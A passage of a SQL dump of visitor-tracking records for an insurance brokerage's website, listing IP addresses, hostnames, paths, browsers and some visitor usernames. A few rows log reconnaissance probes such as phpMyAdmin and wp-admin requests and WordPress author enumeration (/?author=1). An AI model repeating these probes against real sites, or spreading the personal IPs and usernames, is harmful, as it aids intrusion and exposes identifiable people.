Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10644,'0b_af99086e98957ee9e6cb6bc04fc4bf5c','1459367718','74.108.97.66','static-74-108-97-66.nycmny.fios.verizon.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10647,'0b_afd028d6f7b51bfda6a5c484f04bfa65','1459367767','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10650,'0b_afd028d6f7b51bfda6a5c484f04bfa65','1459367769','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10653,'0b_8d61a72e1923df4d1a7e99c50fe46fd2','1459367786','66.249.83.217,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(10656,'0b_ce56931ee84abaeabbe1fb55618bf2be','1459368410','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(10658,'0b_f6a503272363e7ffcb49226a0074f246','1459368410','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10661,'0b_ce56931ee84abaeabbe1fb55618bf2be','1459368412','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(10662,'0b_f6a503272363e7ffcb49226a0074f246','1459368412','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10665,'0b_24eec73593dd3bf52fa8db4a555bd6f6','1459368606','180.76.15.145','baiduspider-180-76-15-145.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(10667,'0b_f9273ad2841c9719230d744a51212946','1459368709','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(10668,'0b_563cbd31855ebe78a4055922bbb973d4','1459369643','173.3.196.252','ool-ad03c4fc.dyn.optonline.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E233 Safari/601.1','https://www.google.com/','_notprovided_',1,'iPhone OS','Safari 9 Mobile','us','','Google','','','','','0','0',0),(10670,'0b_563cbd31855ebe78a4055922bbb973d4','1459369646','173.3.196.252','ool-ad03c4fc.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E233 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','','','','','','','0','0',0),(10671,'0b_095033335dedb71bd56492bd6335817c','1459370311','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(10674,'0b_095033335dedb71bd56492bd6335817c','1459370315','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(10677,'0b_095033335dedb71bd56492bd6335817c','1459370322','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10679,'0b_095033335dedb71bd56492bd6335817c','1459370328','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10682,'0b_22e1b6d07caa1838673a8d5836200ba4','1459371690','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(10685,'0b_b8f3d72b3b78c3861248e4fedc94b556','1459372089','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(10688,'0b_b8f3d72b3b78c3861248e4fedc94b556','1459372091','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(10691,'0b_b8f3d72b3b78c3861248e4fedc94b556','1459372093','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(10692,'0b_b8f3d72b3b78c3861248e4fedc94b556','1459372104','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(10695,'0b_83e88decccef11fe2f03872ce0f2cc6e','1459372155','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10697,'0b_ed9c39c9a2fc986bd96177e687c0980a','1459373128','180.189.144.175','180.189.144.175','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/537.86.5','https://www.google.com.au/','_notprovided_',1,'MacOSX','Safari 9','au','1920 x 1080','Google AU','','','','','0','0',0),(10698,'0b_ed9c39c9a2fc986bd96177e687c0980a','1459373148','180.189.144.175','180.189.144.175','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/537.86.5','http://www.empireins.com/','',0,'MacOSX','Safari 9','us','1920 x 1080','','','','','','0','0',0),(10700,'0b_ed9c39c9a2fc986bd96177e687c0980a','1459373165','180.189.144.175','180.189.144.175','/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/537.86.5','http://www.empireins.com/','',0,'MacOSX','Safari 9','us','1920 x 1080','','','','','','0','0',0),(10703,'0b_50464ada6346524d4d41e3c2beb58746','1459373181','85.14.244.114','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10706,'0b_00a1ab0d0b824be6fceb22c9de03b71a','1459373183','85.14.245.175','majestic12.co.uk','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10707,'0b_50464ada6346524d4d41e3c2beb58746','1459373185','85.14.244.114','majestic12.co.uk','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10709,'0b_9b078a1894a6007d62c64ac1c18e2b18','1459373556','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(10710,'0b_6640094f9c50d73e1028f0742eab4a0f','1459375369','199.30.25.151','msnbot-199-30-25-151.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(10712,'0b_e319bbef6cc69087ed88e4b51f5a908f','1459378771','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10713,'0b_b47b1a8334ea034fb67b2e82e661f850','1459380452','80.255.192.237','80.255.192.237','/pma/index.php','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8','','',0,'MacOSX','Firefox 3','us','','','','','','','0','0',0),(10716,'0b_6671afbc62d7eb018909579a795f2409','1459386105','178.165.91.57','178-165-91-57-kh.maxnet.ua','/','','','',0,'','','ua','','','Unknown Spider','','','','0','0',0),(10719,'0b_b7d77df4f03444e6b42ad97ce7901b49','1459386591','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(10722,'0b_48a59a7fcc0f92101c58faad67eed4e4','1459387882','199.185.0.215','199.185.0.215','/robots.txt','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(10724,'0b_48a59a7fcc0f92101c58faad67eed4e4','1459387892','199.185.0.215','199.185.0.215','/','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(10727,'0b_48a59a7fcc0f92101c58faad67eed4e4','1459388127','199.185.0.215','199.185.0.215','/robots.txt','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(10728,'0b_48a59a7fcc0f92101c58faad67eed4e4','1459388181','199.185.0.215','199.185.0.215','/','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(10731,'0b_1d2318d0ea6e449207d701d6c4ec799a','1459389316','141.8.143.235','spider-141-8-143-235.yandex.com','/products.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(10733,'0b_d9aee838363aabacd4b6df9b1a42b930','1459397407','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10734,'0b_234a00dd8a3f0d3e28f921df82028ed5','1459404352','62.210.148.246','mj9.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(10736,'0b_234a00dd8a3f0d3e28f921df82028ed5','1459404355','62.210.148.246','mj9.naefmarco.ch','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(10739,'0b_234a00dd8a3f0d3e28f921df82028ed5','1459404356','62.210.148.246','mj9.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(10740,'0b_234a00dd8a3f0d3e28f921df82028ed5','1459404358','62.210.148.246','mj9.naefmarco.ch','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(10743,'0b_4b142a496c441f7d3f03b926abf587c2','1459406740','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10746,'0b_4b142a496c441f7d3f03b926abf587c2','1459407303','207.46.13.106','msnbot-207-46-13-106.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(10749,'0b_d4b3a119b4b00a90e9aedab9a74b9c29','1459407716','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10752,'0b_892697a72fe5bff61f5eeb5f76f779cd','1459409846','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10755,'0b_bf5ad20705baf564b55ca2c198b3b64c','1459411980','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10758,'0b_5dee8d0c1e89937a280f1d4f491e9362','1459413660','66.249.65.78','crawl-66-249-65-78.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(10761,'0b_5dee8d0c1e89937a280f1d4f491e9362','1459413661','66.249.65.75','crawl-66-249-65-75.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(10764,'0b_108b256c837d46f3958409ff4f028866','1459413714','173.254.255.34','173.254.255.34.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinXP','Firefox 16','ua','','','','','','','0','0',0),(10767,'0b_5fbc629aa3a87f717c3ea4d1c0dcc1c4','1459414528','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/crafting-an-essay-9/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10769,'0b_82e1327dbd37b8816e347947a0fa7eac','1459419923','100.43.91.1','spider-100-43-91-1.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(10770,'0b_3cf6ee2aeca382ecd718d68b2a6fe3a6','1459420564','117.7.149.145','ATL4WDPWEB01C.wdp.local','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(10772,'0b_2cd35e444603be416618c1aba57c9717','1459421609','100.43.81.152','spider-100-43-81-152.yandex.com','/top.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(10775,'0b_e337b83f3debe829f97d4265d6055c65','1459423020','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10776,'0b_cb7072d0a06e741e40502027c38b217e','1459423053','199.30.24.172','msnbot-199-30-24-172.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','BingBot','','','','0','0',0),(10778,'0b_20025f286dbe2c81cbcebeaf224c335a','1459423106','5.153.234.154','5.153.234.154','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(10779,'0b_20025f286dbe2c81cbcebeaf224c335a','1459423116','5.153.234.154','5.153.234.154','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(10782,'0b_20025f286dbe2c81cbcebeaf224c335a','1459423128','5.153.234.154','5.153.234.154','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(10785,'0b_ebeec8781c3a23070f0372bcd6b3430b','1459423158','14.165.110.145','14.165.110.145','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(10787,'0b_bfe35a654cbd823eea18dff1e242d829','1459424028','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10790,'0b_57a47eb48dc8f4407fabc79b8c4bf023','1459424604','66.249.65.19','crawl-66-249-65-19.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(10793,'0b_fa8cfa47b9b4f7f5d0b4bac0bd9c6fbd','1459426862','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(10794,'0b_de01cc756035ee5be08fa6be977d3029','1459428170','66.249.75.96','crawl-66-249-75-96.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(10797,'0b_ff168c8f93a39e79176e0623a5dc60c9','1459429048','85.25.198.174','orion1240.startdedicated.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','','',0,'Win7 x64','Firefox 43','us','','','','','','','0','0',0),(10799,'0b_9904273c331076b4afe508d008631c2b','1459429918','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(10800,'0b_9904273c331076b4afe508d008631c2b','1459429920','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(10802,'0b_f3d685aaa9eeb843617106cd226cb3d4','1459430022','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(10805,'0b_7fcc14148c65cb15aacc5455fb1a9777','1459430090','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10806,'0b_7fcc14148c65cb15aacc5455fb1a9777','1459430093','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10809,'0b_9904273c331076b4afe508d008631c2b','1459430471','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(10812,'0b_dfb5c4f9704eac259f95766285bfb4fe','1459430806','173.254.255.34','173.254.255.34.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'Win7','Firefox 16','ua','','','','','','','0','0',0),(10815,'0b_0cd1fb3fd6964bb928873bdd7ec463b6','1459431324','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjepJynhevLAhWI7R4KHd6lCPoQFgg5MAE&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.118443451,d.dmo','',0,'Win7 x64','IE 10','us','1536 x 864','','','','','','0','0',0),(10818,'0b_0cd1fb3fd6964bb928873bdd7ec463b6','1459431327','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1536 x 864','','','','','','0','0',0),(10821,'0b_0cd1fb3fd6964bb928873bdd7ec463b6','1459431349','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1536 x 864','','','','','','0','0',0),(10824,'0b_0cd1fb3fd6964bb928873bdd7ec463b6','1459431402','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','','',0,'Win7 x64','IE 10','us','1536 x 864','','','','','','0','51',0),(10826,'0b_f8fe0e970f4fd2740ce1f331f101319b','1459433651','108.245.65.157','108-245-65-157.lightspeed.rcsntx.sbcglobal.net','/pay','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','','','0','0',0),(10829,'0b_f8fe0e970f4fd2740ce1f331f101319b','1459433661','108.245.65.157','108-245-65-157.lightspeed.rcsntx.sbcglobal.net','/','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','','','0','0',0),(10830,'0b_f8fe0e970f4fd2740ce1f331f101319b','1459433662','108.245.65.157','108-245-65-157.lightspeed.rcsntx.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','http://www.empireins.com/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','','','0','0',0),(10832,'0b_3637bca71850b1f8b19672a1c84d37a4','1459434263','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10835,'0b_3637bca71850b1f8b19672a1c84d37a4','1459434396','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(10836,'0b_98c9091f9f0a69725b40906ed903407f','1459435506','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10838,'0b_98c9091f9f0a69725b40906ed903407f','1459435508','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10841,'0b_98c9091f9f0a69725b40906ed903407f','1459435513','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10842,'0b_5edb95c802decfd5229b729948aa028a','1459435566','52.37.182.139','ec2-52-37-182-139.us-west-2.compute.amazonaws.com','/robots.txt','Searchie/1.0 (a Storm-based crawler; https://www.searchie.org; admin@searchie.org)','','',0,'','','','','','Searchie','','','','0','0',0),(10845,'0b_5edb95c802decfd5229b729948aa028a','1459435567','52.37.182.139','ec2-52-37-182-139.us-west-2.compute.amazonaws.com','/','Searchie/1.0 (a Storm-based crawler; https://www.searchie.org; admin@searchie.org)','','',0,'','','','','','Searchie','','','','0','0',0),(10847,'0b_b7e06e817785c463db89326f6ab6ec69','1459436707','184.154.36.163','scan21.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10848,'0b_b7e06e817785c463db89326f6ab6ec69','1459436710','184.154.36.163','scan21.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10850,'0b_b7e06e817785c463db89326f6ab6ec69','1459436714','184.154.36.163','scan21.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10851,'0b_b7e06e817785c463db89326f6ab6ec69','1459436715','184.154.36.163','scan21.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10853,'0b_b7e06e817785c463db89326f6ab6ec69','1459436719','184.154.36.163','scan21.sitelock.com','/register/','Mozilla/5.0 (compatible; 